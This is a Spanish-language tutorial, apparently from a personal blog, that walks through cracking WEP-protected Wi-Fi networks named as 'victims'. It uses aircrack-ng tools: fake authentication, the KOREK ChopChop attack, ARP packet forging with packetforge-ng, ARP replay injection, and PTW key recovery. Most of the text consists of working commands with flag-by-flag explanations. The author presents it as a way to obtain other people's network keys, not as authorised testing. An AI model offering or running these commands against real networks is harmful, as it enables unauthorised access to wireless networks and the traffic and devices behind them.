Ataque KOREK ChopChop

Como una continuación del articulo anterior de ataques "no client", en el cual utilizamos el ataque arp-replay, aveces este ataque puede demorar mucho...hasta un dia o mas en capturar un arp, en estos casos es mejor utilizar el ataque ChopChop, el cual obtiene un producto cruzado(PRGA) de un paquete, para luego tomar el contenido de este y utilizarlo para crear un paqute arp, el que luego injectaremos en la red victima con el fin de generar trafico de red.

como siempre comenzaremos capturando los paquetes con el airodump, identificando el canal en el cual se encuentra la victima.

bash-3.1# airodump-ng ath0 --channel 11 -w captura

luego es necesario crear una autenticación falsa, como habiamos visto en el ejemplo anterior, esto lo hacemos:

aireplay-ng ath0 --fakeauth 20 -e KENOBII -a 00:11:50:XX:XX:XX -h 00:17:9A:XX:XX:XX

donde:

ath0 :interface
--fakeauth 20 :especifica el ataque y establece la peridicidad de este
-e KENOBII :ESSID, en este caso KENOBII
-a 00:11:50:XX:XX:XX :MAC de AP victima
-h 00:17:9A:XX:XX:XX :mi MAC

El comando anterior nos debe mostrar algo así
Ahora es el momento de empezar con el ataque chopchop, y esto lo hacemos utilizando la siguiente linea de comandos:

aireplay-ng ath0 --chopchop -b 00:11:50:XX:XX:XX -h 00:17:9A:XX:XX:XX

ath0 :interface
--chopchop :especifica el ataque
-b 00:11:50:XX:XX:XX :MAC de AP victima
-h 00:17:9A:XX:XX:XX :mi MAC

en este momento el programa comienza a leer paquetes
al encontrar un que nos sive nos preguntará, en este momento es necesario fijarnos que el Dest. MAC = FF:FF:FF:FF:FF:FF , ya que esto nos indica que es un broadcast, y esto nos servirá mas adelante
al terminar de "decriptar" el paquete nos muestra algo así:
en algunos manuales he leido que abren el archivo .xor con el tcpdump, con el fin de encontrar una ip que nos de el rango de ip que usa esta red, en este caso yo no hare eso, sinó que creare un arp directamente al broadcast.

root@darkstar:~/chopchop# packetforge-ng --arp -a 00:11:50:XX:XX:XX -h 00:17:9A:XX:XX:XX -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-1224-150656.xor -w pakete.cap

donde:

--arp :especifica que creara un arp
-a 00:11:50:XX:XX:XX :especifica la mac de la victima
-h 00:17:9A:XX:XX:XX :mi MAC
-k 255.255.255.255 :ip de destino...(para el caso broadcast)
-l 255.255.255.255 :ip del remitente...=broadcast
-y XXX.xor :archivo PRGA..lo obtenemos del ataque chopchop
-w pakete.cap :archivo donde guardaremos nuestro arp

ahora es el momento de mandar nuestro arp, para generar el trafico, esto lo hacemos así:

root@darkstar:~/chopchop# aireplay-ng ath0 --interactive -r pakete.cap

donde:
ath0 : interface
--interactive : ataque
-r pakete.cap : lee desde el archivo pakete.cap

esto nos mostrará lo siguiente
al enviar el paquete, podemos observar en la ventana de captura un inmenso trafico de información a alta velocidad
Esto nos permitirá, en cosa de minutos, obtener la cantidad de paquetes necesarios para poder crackear la red con aircrack, como el uso de aircrack es relativamente sencillo y ademas se encuentra en el manual anterior, dejaremos este manual asta asqui, espero les halla servido.

chop

Ataques "no client" a redes wifi (WEP)

La mala suerte me persigue, he aprendido a obtener las calves de redes con WEP pero no tengo trafico de red o muy poco, en este texto vamos a ver como generar este trafico de red por medio del ataque arp replay y fake auth, el arp es address resolution protocol...pero NO vamos a explicar como funciona, para eso existe google.

cabe destacar que en este artaque solo funcionará si el arp es para el broadcast.

En este articulo NO vamos a comenzar hablando sobre el hardware de red a utilizar, tampoco sobre la instalación de drivers y respectivos parches, sin embargo es necesario indicar que la tarjeta utilizada en estos ejemplos es una DWL-520 con chipset atheros 5112, usando drivers MadWifi-ng 0.9.3 y Aircrack 0.9.1.

comenzando por el principio vamos a poner nustra wireless en modo monitor

bash-3.1# wlanconfig ath0 destroy
bash-3.1# wlanconfig ath0 create wlandev wifi0 wlanmode monitor
ath0
bash-3.1#

luego ejecutaremos airodump-ng seguido del nombre de la interface con el fin de buscar una victima

en este caso la red victima será sandokhan, es necesario para una buena captura fijarnos en el canal en el que transmite dicha red.

ahora ejecutaremos el airodump especificando el canal y el archivo donde se guardará nuestra captura

bash-3.1# airodump-ng ath0 --channel 2 -w captura


ahora tenemos el proceso de captura listo, ahora prepararemos los siguientes ataques

- ataque arp replay
- ataque fake auth

persnalmente prefiero hacer el ataque arp replay antes que el otro, me ha dado mejores resultados.

la linea de comando para el ataque es:

bash-3.1# aireplay-ng ath0 --arpreplay -b 00:17:9A:XX:XX:XX -h 00:17:9A:XX:XX:XX

donde:

ath0 <---interface --arpreplay <--- especifica el ataque -b 00:17:9A:XX:XX:XX <--- MAC del AP victima -h 00:17:9A:XX:XX:XX <--- mi MAC (cabe destacar que por coincidencia mi mac es parecida a la de la victima, probaplemente por que mi tarjeta es de la misma marca que la del AP) esto dará un resultado así

ahora realizamos el ataque fake auth, el cual, como su nombre lo dice crea una falsa autenticación con el AP.

esto lo hacemos de la siguiente forma:

bash-3.1# aireplay-ng ath0 --fakeauth 20 -e sandokhan -a 00:17:9A:XX:XX:XX -h 00:17:9A:XX:XX:XX

donde:

ath0 <---interface --fakeauth 20 <--- establece el ataque y le dice que lo haga cada 20 segundos -e sandokhan <--- establece el nombre de la red o ESSID -b 00:17:9A:XX:XX:XX <--- MAC del AP victima -h 00:17:9A:XX:XX:XX <--- mi MAC tendremos algo así

ahora esperamos a que el AP se digne a enviarnos un arp, cuando esto suceda
nuestro ataque enviará una respuesta a ese arp pero pidiendo otro arp, lo que nos dará nuestro preciado trafico de red.

al suceder esto tendremos algo así

además podremos observar que se ha generado trafico de red.

al llegar a por sobre los 10000 paquetes comenzaremos a crackear usando el ataque PTW.

bash-3.1# aircrack-ng -z captura-01.cap

donde -z establece el ataque PTW, el cual es mas rapido ya que requiere menor cantidad de paquetes.

al terminar tendremos algo así

donde tendremos nuestra preciada clave

agradecería cualquier consulta, duda, correción o chuchada
espero esto le sirva a alguien.
chop ------pantalondemilico at hotmail